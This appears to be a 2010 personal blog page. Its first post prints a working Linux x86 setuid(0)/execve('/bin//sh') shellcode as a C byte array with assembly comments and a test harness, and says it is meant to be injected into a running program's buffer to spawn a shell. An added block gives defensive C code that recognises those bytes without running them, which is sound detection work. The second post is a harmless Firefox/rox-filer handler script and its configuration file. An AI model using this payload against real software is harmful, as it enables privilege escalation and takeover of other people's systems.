Saturday, July 10, 2010

Setuid(0) && execve("/bin//sh",0,0) shellcode

This is just something I picked up from reading; the point of this code is shellcode execution. If this shellcode gets into the buffer of a running program and is then executed, it spawns a shell on the system, which we can use to run commands on the system where the program is running.
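// 35 bytes, Linux x86 (32-bit): setuid(0) followed by execve("/bin//sh",0,0)

char shellcode[]=
"\x31\xc0"                      //xor    %eax,%eax
"\x31\xdb"                      //xor    %ebx,%ebx
"\x31\xc9"                      //xor    %ecx,%ecx
"\x31\xd2"                      //xor    %edx,%edx
"\xb0\x17"                      //mov    $0x17,%al      ; syscall 23 = setuid
"\x31\xdb"                      //xor    %ebx,%ebx      ; uid = 0
"\xcd\x80"                      //int    $0x80
"\xb0\x0b"                      //mov    $0xb,%al       ; syscall 11 = execve
"\x53"                          //push   %ebx           ; NUL terminator for the path
"\x68\x2f\x2f\x73\x68"          //push   $0x68732f2f    ; "//sh"
"\x68\x2f\x62\x69\x6e"          //push   $0x6e69622f    ; "/bin"
"\x89\xe3"                      //mov    %esp,%ebx      ; ebx -> "/bin//sh"
"\x31\xc9"                      //xor    %ecx,%ecx      ; argv = 0
"\x31\xd2"                      //xor    %edx,%edx      ; envp = 0
"\xcd\x80";                     //int    $0x80

int main(void)
{
 // Calls the byte array as if it were a function. Where the data segment is
 // mapped non-executable (NX), this call faults instead of running the bytes.
 (*(void(*)()) shellcode)();
}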
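Seen from the defending side, the same 35 bytes can be recognized statically in a captured buffer without ever executing them. The following is an added example, not code from the original post: the names `scan`, `is_setuid_shell` and `struct finding` are hypothetical, and the decoder only understands the six opcodes that appear in the listing above, so it is a signature for this payload rather than a general x86 disassembler.

```c
#include <stdint.h>
#include <string.h>

/* Constructed input: the 35 bytes from the post, held as inert data. */
static const uint8_t sample[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x53"
    "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xcd\x80";

struct finding {
    int sys[4], nsys;  /* value of %al at each int $0x80, in order */
    char path[17];     /* push $imm32 operands, reassembled in memory order */
};

/* Linear sweep over the six opcodes this payload uses; -1 on anything else. */
int scan(const uint8_t *p, size_t n, struct finding *f)
{
    size_t i = 0, len = 0; uint8_t al = 0;
    memset(f, 0, sizeof *f);
    while (i < n) {
        size_t need = p[i] == 0x53 ? 1 : p[i] == 0x68 ? 5 : 2;
        if (i + need > n) return -1;              /* truncated instruction */
        switch (p[i]) {
        case 0x31: case 0x89:                     /* xor / mov, reg-to-reg only */
            if ((p[i + 1] & 0xc0) != 0xc0) return -1; break;
        case 0xb0: al = p[i + 1]; break;          /* mov $imm8,%al */
        case 0x53: break;                         /* push %ebx (NUL terminator) */
        case 0x68:                                /* push $imm32 */
            if (len + 4 > 16) return -1;
            memmove(f->path + 4, f->path, len);   /* stack grows down: prepend */
            memcpy(f->path, p + i + 1, 4);
            len += 4; break;
        case 0xcd:                                /* int $imm8 */
            if (p[i + 1] == 0x80 && f->nsys < 4) f->sys[f->nsys++] = al; break;
        default: return -1;
        }
        i += need;
    }
    return 0;
}

/* 1 if the bytes decode to setuid (23) then execve (11) of "/bin//sh". */
int is_setuid_shell(const uint8_t *p, size_t n)
{
    struct finding f;
    return scan(p, n, &f) == 0 && f.nsys == 2 && f.sys[0] == 23 &&
           f.sys[1] == 11 && strcmp(f.path, "/bin//sh") == 0;
}

int main(void) { return !is_setuid_shell(sample, sizeof sample - 1); } /* exit 0 on match */
```

Because the path is rebuilt from the `push` operands in stack order, the check also shows why the string appears reversed in four-byte chunks in the byte listing.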

Tuesday, July 6, 2010

Combining "rox-filer" with "firefox"



If you really want to use a minimalist window manager like the "box-box" ones, you may run into the same problem: you cannot use "Open download folder" directly from the right-click menu of Firefox's download manager. Here is the approach I use (worked out by my own reasoning) to get around it:

1. create file "~/.mozilla/firefox/rox.sh"

#!/bin/sh
# rox launcher for firefox
# by : zam a.k.a. s3m
if [ -z "$1" ]
then
 exit 65
else
 # quote the URI so spaces or glob characters in it are not split or expanded
 /usr/bin/rox -U "$1"
fi

2. chmod file "~/.mozilla/firefox/rox.sh"

zam@darkstar$ chmod +x ~/.mozilla/firefox/rox.sh

3. edit file "~/.mozilla/firefox/xxxxxxxx.default/mimeTypes.rdf"
The most important part to edit is:
  
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />

Here is the complete file:
<?xml version="1.0"?>
<RDF:RDF xmlns:NC="http://home.netscape.com/NC-rdf#"
         xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
  <RDF:Description RDF:about="urn:scheme:handler:mailto"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&amp;url=%s"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/thunderbird"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:rtsp"
                   NC:value="rtsp">
    <NC:handlerProp RDF:resource="urn:scheme:handler:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-bzip2"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:mms"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gnome-mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:file"
                   NC:value="file">
    <NC:handlerProp RDF:resource="urn:scheme:handler:file"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:https://mail.google.com/mail/?extsrc=mailto&amp;url=%s"
                   NC:prettyName="GMail"
                   NC:uriTemplate="https://mail.google.com/mail/?extsrc=mailto&amp;url=%s" />
  <RDF:Description RDF:about="urn:handler:local:~/.mozilla/firefox/rox.sh"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:scheme:webcal"
                   NC:value="webcal">
    <NC:handlerProp RDF:resource="urn:scheme:handler:webcal"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/thunderbird"
                   NC:prettyName="thunderbird"
                   NC:path="/usr/bin/thunderbird" />
  <RDF:Description RDF:about="urn:handler:web:https://www.mibbit.com/?url=%s"
                   NC:prettyName="Mibbit"
                   NC:uriTemplate="https://www.mibbit.com/?url=%s" />
  <RDF:Description RDF:about="urn:mimetype:text/x-sh"
                   NC:value="text/x-sh"
                   NC:editable="true"
                   NC:description="shell script">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-csrc"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-csrc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:webcal"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:http://30boxes.com/external/widget?refer=ff&amp;url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/mplayer"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:scheme:handler:irc"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://compose.mail.yahoo.com/?To=%s"
                   NC:prettyName="Yahoo! Mail"
                   NC:uriTemplate="http://compose.mail.yahoo.com/?To=%s" />
  <RDF:Description RDF:about="urn:scheme:handler:ircs"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:web:https://www.mibbit.com/?url=%s"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:rtsp"
                   NC:prettyName="mplayer"
                   NC:path="/usr/bin/mplayer" />
  <RDF:Description RDF:about="urn:mimetype:application/zip"
                   NC:value="application/zip"
                   NC:editable="true"
                   NC:description="Zip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/zip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gnome-mplayer"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:handler:audio/mpeg3"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:audio/mpeg3"
                   NC:value="audio/mpeg3"
                   NC:editable="true"
                   NC:description="">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:audio/mpeg3"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-java-archive"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:handler:application/x-gzip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:rtsp"
                   NC:alwaysAsk="true">
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/mplayer"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/xine"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:/usr/bin/gxine"/>
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:rtsp"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/xine"
                   NC:prettyName="xine"
                   NC:path="/usr/bin/xine" />
  <RDF:Description RDF:about="urn:mimetype:handler:text/x-sh"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:text/x-sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:schemes">
    <NC:Protocol-Schemes RDF:resource="urn:schemes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mms"
                   NC:value="mms">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mms"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:externalApplication:file"
                   NC:prettyName="rox"
                   NC:path="~/.mozilla/firefox/rox.sh" />
  <RDF:Description RDF:about="urn:mimetypes">
    <NC:MIME-types RDF:resource="urn:mimetypes:root"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-gzip"
                   NC:value="application/x-gzip"
                   NC:editable="true"
                   NC:description="Gzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-gzip"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:local:/usr/bin/gxine"
                   NC:prettyName="gxine"
                   NC:path="/usr/bin/gxine" />
  <RDF:Description RDF:about="urn:mimetype:handler:application/zip"
                   NC:alwaysAsk="true"
                   NC:saveToDisk="true">
    <NC:externalApplication RDF:resource="urn:mimetype:externalApplication:application/zip"/>
  </RDF:Description>
  <RDF:Seq RDF:about="urn:schemes:root">
    <RDF:li RDF:resource="urn:scheme:mailto"/>
    <RDF:li RDF:resource="urn:scheme:irc"/>
    <RDF:li RDF:resource="urn:scheme:ircs"/>
    <RDF:li RDF:resource="urn:scheme:webcal"/>
    <RDF:li RDF:resource="urn:scheme:file"/>
    <RDF:li RDF:resource="urn:scheme:rtsp"/>
    <RDF:li RDF:resource="urn:scheme:mms"/>
  </RDF:Seq>
  <RDF:Seq RDF:about="urn:mimetypes:root">
    <RDF:li RDF:resource="urn:mimetype:application/x-gzip"/>
    <RDF:li RDF:resource="urn:mimetype:audio/mpeg3"/>
    <RDF:li RDF:resource="urn:mimetype:application/zip"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-java-archive"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-csrc"/>
    <RDF:li RDF:resource="urn:mimetype:application/x-bzip2"/>
    <RDF:li RDF:resource="urn:mimetype:text/x-sh"/>
  </RDF:Seq>
  <RDF:Description RDF:about="urn:scheme:irc"
                   NC:value="irc">
    <NC:handlerProp RDF:resource="urn:scheme:handler:irc"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:handler:file"
                   NC:alwaysAsk="false">
    <NC:externalApplication RDF:resource="urn:scheme:externalApplication:file"/>
    <NC:possibleApplication RDF:resource="urn:handler:local:~/.mozilla/firefox/rox.sh"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:mailto"
                   NC:value="mailto">
    <NC:handlerProp RDF:resource="urn:scheme:handler:mailto"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:scheme:ircs"
                   NC:value="ircs">
    <NC:handlerProp RDF:resource="urn:scheme:handler:ircs"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-bzip2"
                   NC:value="application/x-bzip2"
                   NC:editable="true"
                   NC:description="Bzip archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-bzip2"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:mimetype:application/x-java-archive"
                   NC:value="application/x-java-archive"
                   NC:editable="true"
                   NC:description="Java Archive">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:application/x-java-archive"/>
  </RDF:Description>
  <RDF:Description RDF:about="urn:handler:web:http://30boxes.com/external/widget?refer=ff&amp;url=%s"
                   NC:prettyName="30 Boxes"
                   NC:uriTemplate="http://30boxes.com/external/widget?refer=ff&amp;url=%s" />
  <RDF:Description RDF:about="urn:root"
                   NC:en-US_defaultHandlersVersion="3" />
  <RDF:Description RDF:about="urn:scheme:externalApplication:mms"
                   NC:prettyName="gnome-mplayer"
                   NC:path="/usr/bin/gnome-mplayer" />
  <RDF:Description RDF:about="urn:mimetype:text/x-csrc"
                   NC:value="text/x-csrc"
                   NC:editable="true"
                   NC:description="C source code">
    <NC:handlerProp RDF:resource="urn:mimetype:handler:text/x-csrc"/>
  </RDF:Description>
</RDF:RDF>

4. restart firefox and download a file, then try the "Open" or "Open containing folder" menu ;).